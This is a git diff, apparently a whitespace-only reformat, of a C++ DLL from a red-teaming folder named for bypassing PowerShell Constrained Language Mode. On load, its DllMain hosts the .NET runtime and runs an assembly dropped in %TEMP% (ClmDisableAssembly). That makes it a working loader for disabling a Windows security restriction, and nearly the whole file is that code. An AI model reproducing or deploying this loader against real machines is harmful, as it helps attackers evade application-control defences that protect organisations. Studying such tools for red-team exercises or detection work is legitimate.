diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp index 6737abb..41f8d2a 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp +++ b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp @@ -18,126 +18,126 @@ // Specify below .NET assembly, main class to instantiate and parameters to pass there. namespace CustomAssemblyParameters { - LPCWSTR AssemblyName = L"%TEMP%\\ClmDisableAssembly.dll"; - LPCWSTR TypeName = L"ClmDisableAssembly.ClmDisableAssembly"; - LPCWSTR MethodName = L"Start"; - LPCWSTR Argument = L"(called from native CLR host)"; + LPCWSTR AssemblyName = L"%TEMP%\\ClmDisableAssembly.dll"; + LPCWSTR TypeName = L"ClmDisableAssembly.ClmDisableAssembly"; + LPCWSTR MethodName = L"Start"; + LPCWSTR Argument = L"(called from native CLR host)"; } ////////////////////////////////////////////////// #ifdef _DEBUG -# define msg(x) MessageBoxW(nullptr, x, L"LoadCLRFromNativeDLL", 0) +# define msg(x) MessageBoxW(nullptr, x, L"LoadCLRFromNativeDLL", 0) #else -# define msg(x) ((void)0) +# define msg(x) ((void)0) #endif void DoProcessAttach() { - ICLRMetaHost *metaHost = nullptr; - ICLRRuntimeInfo *runtimeInfo = nullptr; - ICLRRuntimeHost *runtimeHost = nullptr; - IEnumUnknown *runtime = nullptr; - IUnknown *enumRuntime = nullptr; + ICLRMetaHost *metaHost = nullptr; + ICLRRuntimeInfo *runtimeInfo = nullptr; + ICLRRuntimeHost *runtimeHost = nullptr; + IEnumUnknown *runtime = nullptr; + IUnknown *enumRuntime = nullptr; - LPWSTR frameworkName = nullptr; - DWORD bytes = 2048; - DWORD result = 0; + LPWSTR frameworkName = nullptr; + DWORD bytes = 2048; + DWORD result = 0; - if (CLRCreateInstance( - CLSID_CLRMetaHost, - IID_ICLRMetaHost, - reinterpret_cast(&metaHost) - ) != S_OK) { - msg(L"FAIL: Could not create MetaHost CLR instance."); - return; - } + if (CLRCreateInstance( + CLSID_CLRMetaHost, + IID_ICLRMetaHost, + reinterpret_cast(&metaHost) + ) != S_OK) { + msg(L"FAIL: Could not create MetaHost CLR instance."); + return; + } - if (!metaHost || (metaHost->EnumerateInstalledRuntimes( - &runtime - ) != S_OK)) { - msg(L"FAIL: Cannot enumerate installed runtimes."); - return; - } + if (!metaHost || (metaHost->EnumerateInstalledRuntimes( + &runtime + ) != S_OK)) { + msg(L"FAIL: Cannot enumerate installed runtimes."); + return; + } - if (!runtime) { - msg(L"FAIL: Could not find installed runtimes."); - return; - } + if (!runtime) { + msg(L"FAIL: Could not find installed runtimes."); + return; + } - frameworkName = reinterpret_cast(LocalAlloc( - LPTR, - bytes - )); - if (!frameworkName) { - msg(L"FAIL: could not allocate 2048 bytes for framework name buffer."); - return; - } + frameworkName = reinterpret_cast(LocalAlloc( + LPTR, + bytes + )); + if (!frameworkName) { + msg(L"FAIL: could not allocate 2048 bytes for framework name buffer."); + return; + } - while (runtime->Next(1, &enumRuntime, 0) == S_OK) { - if (enumRuntime && (enumRuntime->QueryInterface(&runtimeInfo) == S_OK)) { - if (runtimeInfo != nullptr) { - runtimeInfo->GetVersionString(frameworkName, &bytes); - } - } - } + while (runtime->Next(1, &enumRuntime, 0) == S_OK) { + if (enumRuntime && (enumRuntime->QueryInterface(&runtimeInfo) == S_OK)) { + if (runtimeInfo != nullptr) { + runtimeInfo->GetVersionString(frameworkName, &bytes); + } + } + } - if (runtimeInfo == nullptr || (runtimeInfo->GetInterface( - CLSID_CLRRuntimeHost, - IID_ICLRRuntimeHost, - reinterpret_cast(&runtimeHost) - ) != S_OK)) { - msg(L"FAIL: Could not get CLRRuntimeHost interface's reference."); - return; - } + if (runtimeInfo == nullptr || (runtimeInfo->GetInterface( + CLSID_CLRRuntimeHost, + IID_ICLRRuntimeHost, + reinterpret_cast(&runtimeHost) + ) != S_OK)) { + msg(L"FAIL: Could not get CLRRuntimeHost interface's reference."); + return; + } - if (runtimeHost == nullptr) { - msg(L"FAIL: Could not obtain reference to CLRRuntimeHost."); - return; - } + if (runtimeHost == nullptr) { + msg(L"FAIL: Could not obtain reference to CLRRuntimeHost."); + return; + } - runtimeHost->Start(); + runtimeHost->Start(); - WCHAR assemblyPath[1024] = L""; - ExpandEnvironmentStringsW(CustomAssemblyParameters::AssemblyName, assemblyPath, _countof(assemblyPath)); - LPCWSTR assemblyPathPtr = assemblyPath; + WCHAR assemblyPath[1024] = L""; + ExpandEnvironmentStringsW(CustomAssemblyParameters::AssemblyName, assemblyPath, _countof(assemblyPath)); + LPCWSTR assemblyPathPtr = assemblyPath; - HRESULT hres = runtimeHost->ExecuteInDefaultAppDomain( - assemblyPathPtr, - CustomAssemblyParameters::TypeName, - CustomAssemblyParameters::MethodName, - CustomAssemblyParameters::Argument, - &result - ); - if (hres != S_OK) { - wchar_t msgbuf[1024] = L""; - swprintf_s(msgbuf, L"FAIL: Could not invoke custom .NET assembly, instantiate it's type or invoke a method. HRESULT = 0x%08x . Assembly path: '%s'", hres, assemblyPath); - msg(msgbuf); - } + HRESULT hres = runtimeHost->ExecuteInDefaultAppDomain( + assemblyPathPtr, + CustomAssemblyParameters::TypeName, + CustomAssemblyParameters::MethodName, + CustomAssemblyParameters::Argument, + &result + ); + if (hres != S_OK) { + wchar_t msgbuf[1024] = L""; + swprintf_s(msgbuf, L"FAIL: Could not invoke custom .NET assembly, instantiate it's type or invoke a method. HRESULT = 0x%08x . Assembly path: '%s'", hres, assemblyPath); + msg(msgbuf); + } - //runtimeHost->Stop(); - //runtimeHost->Release(); - runtimeInfo->Release(); - metaHost->Release(); + //runtimeHost->Stop(); + //runtimeHost->Release(); + runtimeInfo->Release(); + metaHost->Release(); } BOOLEAN WINAPI DllMain( - IN HINSTANCE /*hDllHandle*/, - IN DWORD nReason, - IN LPVOID /*Reserved*/ + IN HINSTANCE /*hDllHandle*/, + IN DWORD nReason, + IN LPVOID /*Reserved*/ ) { - switch (nReason) - { - case DLL_PROCESS_ATTACH: - { - DoProcessAttach(); - break; - } - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return TRUE; -} \ No newline at end of file + switch (nReason) + { + case DLL_PROCESS_ATTACH: + { + DoProcessAttach(); + break; + } + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return TRUE; +}